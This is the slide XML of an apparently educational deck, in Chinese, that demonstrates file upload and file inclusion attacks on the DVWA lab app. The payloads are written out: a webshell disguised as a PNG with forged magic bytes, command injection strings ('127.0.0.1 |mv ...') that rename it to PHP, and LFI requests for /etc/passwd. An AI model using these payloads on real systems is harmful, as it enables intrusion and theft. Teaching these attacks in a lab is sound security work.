              <a:t> ) == "jpg" || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ) == "jpeg" || </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strtolower</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uploaded_ext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ) == "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>" )</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> &amp;&amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        ( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> &lt; 100000 ) &amp;&amp; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>getimagesize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>( $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>uploaded_tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> ) ) { 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9744" y="5524491"/>
            <a:ext cx="45720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dirty="0" smtClean="0"/>
              <a:t>程式碼限制了副檔名的名稱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jpg,jpeg,png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4330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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr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187799" y="1245210"/>
            <a:ext cx="1821305" cy="378491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smtClean="0"/>
              <a:t>shell3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.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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187799" y="2234821"/>
            <a:ext cx="1911457" cy="333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 smtClean="0"/>
              <a:t>shell3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.png</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900313" y="1683053"/>
            <a:ext cx="396275" cy="492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414095" y="1744595"/>
            <a:ext cx="263245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將webshell先修改副檔名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4520485" y="1929261"/>
            <a:ext cx="302653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 smtClean="0"/>
              <a:t>使用HxD工具開啟shell3.png</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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592" y="2567888"/>
            <a:ext cx="61912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1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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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20095" y="1739245"/>
            <a:ext cx="3045853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 smtClean="0"/>
              <a:t>插入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>png header</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>複</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>製</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>89 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>50 4E 47 0D 0A 1A 0A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57" y="2631229"/>
            <a:ext cx="6200775" cy="363855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800624" y="3933834"/>
            <a:ext cx="311511" cy="277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956379" y="4780209"/>
            <a:ext cx="1520916" cy="152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63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12" y="1646439"/>
            <a:ext cx="7806247" cy="470284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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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63951" y="2371859"/>
            <a:ext cx="413334" cy="319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1213229" y="1824483"/>
            <a:ext cx="71477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 smtClean="0"/>
              <a:t>儲存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098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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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28" y="1323768"/>
            <a:ext cx="5530520" cy="361929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669" y="2983690"/>
            <a:ext cx="4836422" cy="356474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962455" y="5181320"/>
            <a:ext cx="1737058" cy="318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487593" y="3765666"/>
            <a:ext cx="160653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上傳</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>shell3.png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243" y="4815352"/>
            <a:ext cx="3467634" cy="180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7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3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="102282" y="1117082"/>
            <a:ext cx="6867525" cy="313038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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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80395" y="3800236"/>
            <a:ext cx="1138985" cy="330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2908729" y="4302788"/>
            <a:ext cx="2931061" cy="3707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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>/www/html/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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1751527" y="5292399"/>
            <a:ext cx="6503831" cy="3262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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>/www/html/DVWA/hackable/uploads/shell3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621243" y="4740630"/>
            <a:ext cx="396275" cy="482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1751527" y="6237518"/>
            <a:ext cx="7225048" cy="3262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/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>/www/html/DVWA/hackable/uploads/shell3.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php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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向下箭號 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3621243" y="5755202"/>
            <a:ext cx="396275" cy="482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765183" y="4035108"/>
            <a:ext cx="41040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利用Command Injection找到網站根目錄</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4374259" y="3107235"/>
            <a:ext cx="162416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127.0.0.1 |pwd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4246981" y="5743410"/>
            <a:ext cx="350288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目標將把shell3.png改成shell3.php</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="224578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" y="1304925"/>
            <a:ext cx="8239125" cy="42481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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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76966" y="3785722"/>
            <a:ext cx="2428634" cy="2927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52437" y="5940910"/>
            <a:ext cx="7965849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127.0.0.1 |</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/www/html/DVWA/hackable/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell3.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/www/html/DVWA/hackable/uploads/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shell3.php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92517" y="5451391"/>
            <a:ext cx="341151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利用Command Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重新</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命名</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="343605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/>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_HIGH</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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2" y="1481137"/>
            <a:ext cx="8302820" cy="471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4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99"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636425" y="2055815"/>
            <a:ext cx="6878927" cy="366296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79046" y="1025095"/>
            <a:ext cx="3409459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DVWA_1.10_low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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"/>
            <a:ext cx="9144000" cy="87321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5400" dirty="0"/>
              <a:t>DEMO:: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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inclusion </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="279046" y="1025095"/>
            <a:ext cx="3409459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DVWA_1.10_low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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向右箭號 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="797195" y="5162809"/>
            <a:ext cx="840259" cy="76611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點選</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="303644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50"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="1256489"/>
            <a:ext cx="8427574" cy="5277663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeo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0" y="581025"/>
            <a:ext cx="9144000" cy="5381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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>page=file1.php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6510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538164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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=file2.php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21" t="4670" r="8032" b="51113"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="238127" y="1366840"/>
            <a:ext cx="8161083" cy="383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5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0" y="581025"/>
            <a:ext cx="9144000" cy="5381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http://192.168.1.250/DVWA/vulnerabilities/fi/?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page=file1.php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46" y="1290767"/>
            <a:ext cx="8661452" cy="450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2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8615" y="3266509"/>
            <a:ext cx="7886700" cy="475615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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/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etc/passwd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8615" y="6118097"/>
            <a:ext cx="801624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http://192.168.1.250/DVWA/vulnerabilities/fi/? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>page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http://www.google.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="1456795"/>
            <a:ext cx="630936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http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>page=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file1.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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dirty="0"/>
              <a:t>測試是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0"/>
              <a:t>File inclusion vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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252084" y="1030651"/>
            <a:ext cx="60135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原本是要讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>file1.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>來執行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177165" y="2681734"/>
            <a:ext cx="77069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/>
              <a:t>卻被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不肖客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>用來讀取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" err="1"/>
              <a:t>webServer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>上的密碼檔</a:t>
            </a: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348615" y="4029783"/>
            <a:ext cx="7886700" cy="4756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dirty="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>page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../../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passwd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9835" y="5067576"/>
            <a:ext cx="736611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/>
              <a:t>甚至被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不肖客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>用來讀取別台機器上的惡意程式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>通常都是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不肖客</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>自己植入在國外網站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>)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2085253"/>
            <a:ext cx="5543550" cy="4883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/>
              <a:t>Local File inclusion(LFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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2" y="4579233"/>
            <a:ext cx="6981825" cy="4883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/>
              <a:t>Remote  File inclusion(RFI)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3369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1664991" y="2181227"/>
            <a:ext cx="5822622" cy="415367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304078"/>
            <a:ext cx="9144000" cy="4883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/>
              <a:t>Local File inclusion(LFI)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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1543052" y="2181227"/>
            <a:ext cx="6011045" cy="159067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-24590" y="2611755"/>
            <a:ext cx="1567640" cy="9372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確實有漏洞</a:t>
            </a:r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177165" y="1033752"/>
            <a:ext cx="7886700" cy="4756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/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/fi/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW"/>
              <a:t>page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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etc/passwd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766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1135</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>如螢幕大小 (4:3)</PresentationFormat>
  <Paragraphs>172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6" baseType="lpstr">
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>新細明體</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office 佈景主題</vt:lpstr>
      <vt:lpstr>Web Hacking and Exploitation_2_2                 檔案存取相關漏洞        實務測試  File Inclusion (檔案載入) | File Upload(檔案上傳) Local File Inclusion(LFI)| Remote File Inclusion(RFI)</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>File inclusion vulnerability https://en.wikipedia.org/wiki/File_inclusion_vulnerability</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>http://192.168.1.250/DVWA/vulnerabilities/fi/?page=file2.php</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PowerPoint 簡報</vt:lpstr>
      <vt:lpstr>PHP漏洞程式碼分析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Hacking and Exploitation_2_2 檔案存取相關漏洞實務測試  File Inclusion (檔案載入) | File Upload(檔案上傳) Local File Inclusion(LFI)| Remote File Inclusion(RFI)</dc:title>
  <dc:creator>ksu</dc:creator>
  <cp:lastModifiedBy>ksu</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-10-13T08:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-14T19:13:40Z</dcterms:modified>
</cp:coreProperties>
</file>